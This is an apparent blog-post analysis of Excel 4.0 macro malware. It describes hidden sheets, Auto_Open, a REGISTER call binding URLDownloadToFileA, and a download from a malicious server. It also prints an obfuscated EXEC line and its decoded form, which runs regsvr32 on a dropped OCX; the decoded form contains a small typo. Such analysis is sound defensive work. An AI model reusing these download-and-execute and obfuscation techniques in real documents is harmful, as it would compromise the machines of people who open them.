Excel 4.0 Macro Malware— old feature but can be harmful

Figure 1 — The “Enable Content” tempts the victim to run the malicious excel
Figure 2 — Unhide option
Figure 3 — Unhide sheets
Figure 4
Figure 5 — The Auto_Open function

First stage

Figure 6 — The REGISTER function
URLMON = which DLL to load.URLDownloadToFileA = which function to call from the chosen DLL.D20 = "JJCCBB" (used to specify data types to call the API).Drwrgdfghfhf = custom name (will call the function with a new custom name "=Drwrgdfghfhf()").D22 = 1 (Category).D23 = 9 (Category).


Now, we will see the use of the custom name function called “Drwrgdfghfhf”. The adversary will download the malware from a malicious server using HTTP protocol.

Figure 7 — Download a file
Drwrgdfghfhf = custom name of the REGISTER function that we saw on figure 6.Tiposa!E21 = "".Tiposa1!G11 = random number between 213214234(bottom) and 9776980793567560(top) with the RANDBETWEEN() function.Sheet2!K12 = ".dat".
Figure 8 — RANDBETWEEN function

The execution

The last part of the excel 4.0 macro is the file execution. The malware will use the EXEC function to run the malicious OCX file.

Figure 9 — EXEC function
=EXEC(E19&"vr32 C"&":\"&"Pr"&"og"&"ra"&"mD"&"a"&"t"&"a\VDscytujyctfjkvu1.ocx")
E19 = T(E20&E21) = "regs"
E20= "re"
E21= "gs"
=EXEC("rgsvr32 C:\ProgramData\VDscytujyctfjkvu1.ocx")


The excel 4.0 macro is an old feature (XLM 4.0 macro) that was introduced in 1992 by Microsoft. This technique is a different way to execute malicious code through office document. Beware, not only VBA code can compromised your machine.



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store